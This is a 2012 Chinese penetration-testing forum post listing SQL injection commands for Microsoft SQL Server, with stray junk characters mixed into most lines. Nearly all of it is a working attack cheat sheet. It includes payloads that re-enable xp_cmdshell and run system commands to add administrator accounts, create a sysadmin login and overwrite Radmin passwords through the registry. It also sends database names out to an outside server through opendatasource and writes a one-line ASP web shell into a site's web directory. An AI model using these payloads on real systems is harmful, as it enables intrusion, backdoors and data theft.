找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 阿D常用的一些注入命令
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1758|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
" O% G2 W3 A) U9 M' w8 `/ B; l//看看是什么权限的
' q/ w) d. V4 f- l# E) uand 1=(Select IS_MEMBER('db_owner')), w$ O/ W( S( e4 \, m9 }
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--; {4 d* ^, T0 K; K" M; [8 d
, f9 j& {9 F7 b$ j! ^
//检测是否有读取某数据库的权限& e" q% I) s& z( _( G: X8 X- `
and 1= (Select HAS_DBACCESS('master'))
* {9 Q/ ~! `+ E# Q' C( ~) u0 Y( E! eAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --# `  c, I% ?; x- d

5 u6 c. a: m4 R" @3 z% \
* y; q2 a: F) g) Q数字类型
: C" Z# H0 J- c4 Z+ land char(124)%2Buser%2Bchar(124)=0
7 b6 X1 u8 e7 v0 U; y6 E# j& ~1 z$ s6 d2 \' B
字符类型' k8 j  D; i! ]" s2 j7 i
' and char(124)%2Buser%2Bchar(124)=0 and ''='6 W. W# F. \- y5 a; [- U

1 m& W8 T; D$ p( j1 Q搜索类型
" s" f2 J1 U  X: s7 V( k# M) X0 M' and char(124)%2Buser%2Bchar(124)=0 and '%'='; o5 t1 ?% X8 o. h% X
* S: ]* D+ Q& t0 C$ b
爆用户名' j( T; q1 w% x3 x
and user>0$ X( x3 n3 [) e2 D& t' E
' and user>0 and ''='; Q3 T7 I7 t7 W8 D

/ ~3 w7 Z5 B& @" c9 L6 Y; F检测是否为SA权限- ]9 A$ d7 q$ W& p
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
% d8 @% f1 ?! WAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --! \1 ?& ^  K" y1 _

# |7 `) c( A: d9 ]% k检测是不是MSSQL数据库0 ?( l' ?" B; e5 f
and exists (select * from sysobjects);--
- C; O; r' j# v& ^" q
) _# N3 R! x# @0 Q9 v0 A检测是否支持多行; v2 t+ m8 I1 @' ^! }! y' z
;declare @d int;--
3 U& b3 ]$ b8 H8 z0 u( e5 V" }4 ~  t; Z
恢复 xp_cmdshell! W# }, l, Z# @) @
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--4 p8 ?5 J3 z8 C2 r$ G
. p4 |% U4 M8 x# |, ?

+ \2 D; U5 j# a* Xselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 d& e! c( G/ J, ?+ ^- D* E$ g
+ ^  [: I! z4 ^- p. R; u//-----------------------
: e( M; O$ i9 S0 d//      执行命令
7 _0 |! A. q; P! U//-----------------------! f/ C! _. w& M- B1 w3 [; W
首先开启沙盘模式:
2 k& y. K! I7 B6 h8 m* @  pexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, Q8 Z! C$ p9 O! ]- a. |2 B" G8 C
6 S" H1 C" K% [" V, w& f然后利用jet.oledb执行系统命令# {8 e* W0 T$ g1 A0 E
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
9 d! e. ]  m# [0 N: }1 o- Q) i
; V( Z" G) Z, a; y( H执行命令' E  o1 J( V" E! x5 A7 [
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
$ g8 k. J8 Y0 o
, C- a) D0 s9 D# _EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'' ^; T' n! f. O/ N# ^- r3 R
( D2 `) {; E+ x. d( o" W1 q
判断xp_cmdshell扩展存储过程是否存在:# j% K0 l. T+ m1 A
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')7 C2 w$ M+ ^5 c% z+ x1 T- v
1 F  X7 X1 U% b
写注册表' Y) e$ }7 t# s* b: X
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
3 v: s% r: p9 B% }, x% g/ V0 X& G2 y& Q2 Q1 S7 C5 G
REG_SZ
3 s3 L5 c; s& ^
& ~- V5 N3 g. L2 _9 F2 l读注册表# O. i5 ^  v8 H, c* I! X% r
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
7 K# |" z1 U! K* P8 y/ i- R: Q1 I1 S, ~1 f2 o
读取目录内容4 z1 t# |/ J3 C, S' i# g( `0 {
exec master..xp_dirtree 'c:\winnt\system32\',1,11 P9 m5 K1 c* D2 K$ b& }! P6 b
2 h9 Z- p: R# r; \' t# X3 \& p1 U5 N
" ?" Y" T1 I4 `* ~. |; d8 @
数据库备份
' X- A0 ?5 z( M/ |  `2 nbackup database pubs to disk = 'c:\123.bak'3 `+ l# \( O+ `# m: b
* Y8 Q% @4 P/ Y1 [5 s. h1 U
//爆出长度- c, g  I; e) V( p
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--8 \2 r: L+ d0 F. C! I7 w  j
- k, \3 N0 [  z' z

: Y: K/ H3 g+ [7 z" [. O. ^. k+ i7 @# W& \: s- k0 m
更改sa口令方法:用sql综合利用工具连接后,执行命令:% G& e7 Z9 G; h; x1 I+ q
exec sp_password NULL,'新密码','sa'
$ o8 b3 x. b* e  D- P; {0 u. J- Y6 Z0 F5 z# n
添加和删除一个SA权限的用户test:
% n1 y! e9 o4 ?: i+ @exec master.dbo.sp_addlogin test,ptlove
( M( c$ [! ?7 i4 G' E! }; ~, [+ oexec master.dbo.sp_addsrvrolemember test,sysadmin& {* R5 v6 l+ S" v& @$ A7 G! I
* G3 Z. g# n( y* `/ C" R( i
删除扩展存储过过程xp_cmdshell的语句: & A: y9 `# C) \6 I* [; `0 A" x( T
exec sp_dropextendedproc 'xp_cmdshell'0 ^( }7 d- ?9 r9 Y2 Z1 r
- O- U# `. C8 o& n9 a1 s
添加扩展存储过过程
; p9 {; q; s& r4 g5 a  EEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' # F7 Q" q$ z6 W. V- [  ~
GRANT exec On xp_proxiedadata TO public % G& }( O- V# e1 a9 f: R
5 G0 U- B& _1 M
; I! r0 o0 ]/ }$ N5 n
停掉或激活某个服务。
' _4 O) x& w2 ~5 K4 ]. N
# Y* I1 f! s( e$ cexec master..xp_servicecontrol 'stop','schedule'# H% ]" B$ N6 M% P" ^, ^) A
exec master..xp_servicecontrol 'start','schedule'3 \: J! Z! C8 b. p
& ]. H7 @4 K2 N4 @& `
dbo.xp_subdirs" r8 ?/ x& S+ n( ^+ D
9 F4 V' `/ r9 \5 J
只列某个目录下的子目录。
4 J& H" r8 P7 }5 n" V" C5 o4 Vxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
6 L8 A4 i1 X- v9 u$ `- `! g0 M; ]: l
dbo.xp_makecab
6 n9 U- p% @9 L# X; I& ~* i: t' \- X, M- V2 u, o6 q
将目标多个档案压缩到某个目标档案之内。" H. P  I4 j; R5 o' z: K# O
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
7 `0 ^3 s* ?1 q8 \
  N5 m9 m# d: P. z8 @. }' J0 G4 Pdbo.xp_makecab1 e- N/ J: Y5 S! T' }/ ]
'c:\test.cab','mszip',1,
! v3 @6 W+ ?  j6 J% c'C:\Inetpub\wwwroot\SQLInject\login.asp',
( w, h% b, c$ w" E- ^'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
- `" _$ F& y3 c8 W( u; Z8 T) M$ R/ l8 t, e
xp_terminate_process4 _- a5 `% L# @- I( q- x

$ k% k' e6 Z) N3 b. X8 r$ R停掉某个执行中的程序,但赋予的参数是 Process ID。  n6 ]" A: u. a/ h6 h4 V
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
8 g( [9 W! H! d9 F$ A
* }7 F& ?. ~' A: Y/ q' I. Fxp_terminate_process 2484
' ~- H4 J$ D& D) N( a' W3 Z( j, D8 G! [# C8 F
xp_unpackcab
+ c4 V9 H8 P3 w! _7 }. m, L8 T
0 G1 R9 a0 q9 v5 F( ~* ~6 |! @解开压缩档。
1 J# Z9 c7 P. c* Q7 c  t& z5 z( F& i" O' L) Z! \; J
xp_unpackcab 'c:\test.cab','c:\temp',1' [3 @) h7 i& w

4 C% ]: p: `( v5 I0 [
" w: c5 j! n' S' h  N! c/ |某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
; s3 y4 c# D7 f  G- V& h6 g( J7 \  F; J# o' \5 q: A' t8 E
create database lcx;
) ?# I& B. Z( p  u7 Z$ ]0 PCreate TABLE ku(name nvarchar(256) null);9 e9 E+ t2 Z3 I. ~  e" I4 X! R
Create TABLE biao(id int NULL,name nvarchar(256) null);5 c1 r$ z7 l" [  D
% |! v! ?+ X  E4 I: N
//得到数据库名
* l9 g- J( S$ [, ?insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
* M% M- K: U% H' D2 q. Q# A- h5 E' Q$ G/ _  t0 [  a( F

5 T& {2 ]& ^9 d$ r+ t( y0 s! Q//在Master中创建表,看看权限怎样# U! Z: Z& K5 A- _1 M2 v9 u
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
1 J* B$ N, N4 h/ t( e1 [, N, N. s4 q
用 sp_makewebtask直接在web目录里写入一句话马:& v) p9 C% E* a0 q) H9 p$ g0 _$ ^
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--# Z2 T1 |) w- H- z. J, a' h, A

  l( ~. x' s* A; l, m. D' J//更新表内容6 x/ P# S2 f! P% }2 u9 {% ?
Update films SET kind = 'Dramatic' Where id = 1238 ^# ^9 E$ h- ~' b7 C+ D; J

5 H0 M( s. z) `//删除内容9 B3 p5 Y+ n% t% w& l
delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表